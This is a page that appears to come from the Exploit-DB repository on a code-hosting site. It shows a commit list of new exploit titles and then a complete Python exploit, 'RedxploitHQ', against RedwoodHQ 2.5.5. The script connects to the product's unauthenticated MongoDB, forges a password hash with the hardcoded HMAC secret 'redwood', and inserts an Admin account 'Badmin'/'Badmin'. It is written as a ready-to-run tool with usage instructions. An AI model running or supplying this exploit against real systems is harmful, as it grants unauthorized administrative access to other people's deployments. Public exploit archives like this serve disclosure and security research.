8cbfa5df7f
13 changes to exploits/shellcodes HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write Netperf 2.6.0 - Stack-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - Type Confusion Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow Exim 4.87 - 4.91 - Local Privilege Escalation Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell) AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit) RedwoodHQ 2.5.5 - Authentication Bypass CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities Spring Security OAuth - Open Redirector Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
78 lines
No EOL
2.6 KiB
Python
Executable file
78 lines
No EOL
2.6 KiB
Python
Executable file
# -*- encoding: utf-8 -*-
|
|
#!/usr/bin/python3
|
|
|
|
# Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db)
|
|
# Date: 14-june-2019
|
|
# Exploit Author: EthicalHCOP
|
|
# Version: 2.0 / 2.5.5
|
|
# Vendor Homepage: https://redwoodhq.com/
|
|
# Software Link: https://redwoodhq.com/redwood-download/
|
|
# Tested on: Ubuntu and Windows.
|
|
# Twitter: @EthicalHcop
|
|
# Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port
|
|
# Description: Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
|
|
#
|
|
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have her own Mongo Launcher.
|
|
# The problem is that this vendor database doesn't require any authentication to read her data.
|
|
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
|
|
#
|
|
# POC: https://youtu.be/MK9AvoJDtxY
|
|
|
|
import hashlib
|
|
import hmac
|
|
import optparse
|
|
from pymongo import MongoClient
|
|
|
|
def CreateHMAC(Pass):
|
|
message = bytes(Pass,encoding='utf8')
|
|
secret = bytes('redwood',encoding='utf8')
|
|
hash = hmac.new(secret, message, hashlib.md5)
|
|
return (hash.hexdigest())
|
|
|
|
def DbConnect(ip,port):
|
|
uri = "mongodb://" + ip + ":" + port + "/"
|
|
con = MongoClient(uri)
|
|
return con
|
|
|
|
def DbDisconnect(con):
|
|
con.close()
|
|
|
|
def CreateBadminUser(ip, port, user, passw):
|
|
con = DbConnect(ip, port)
|
|
db = con.automationframework
|
|
usr = db.users
|
|
passw = CreateHMAC(passw)
|
|
data = {
|
|
"name": user,
|
|
"password": passw,
|
|
"tag": [],
|
|
"role": "Admin",
|
|
"username": user,
|
|
"status": ""
|
|
}
|
|
usr.insert_one(data)
|
|
DbDisconnect(con)
|
|
|
|
def start():
|
|
parser = optparse.OptionParser('usage %prog ' + \
|
|
'-H host -P port')
|
|
parser.add_option('-P', '--Port', dest='port', type='string', \
|
|
help='MongoDB Port')
|
|
parser.add_option('-H', '--Host', dest='host', type='string', \
|
|
help='MongoDB Host')
|
|
(options, args) = parser.parse_args()
|
|
ip = options.host
|
|
port = options.port
|
|
if (str(ip) == "None"):
|
|
print("Insert Host")
|
|
exit(0)
|
|
if (str(port) == "None"):
|
|
port = "27017"
|
|
try:
|
|
CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
|
|
print("[+] New user 'Badmin'/'Badmin' created.")
|
|
except Exception as e:
|
|
print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))
|
|
|
|
if __name__ == '__main__':
|
|
start() |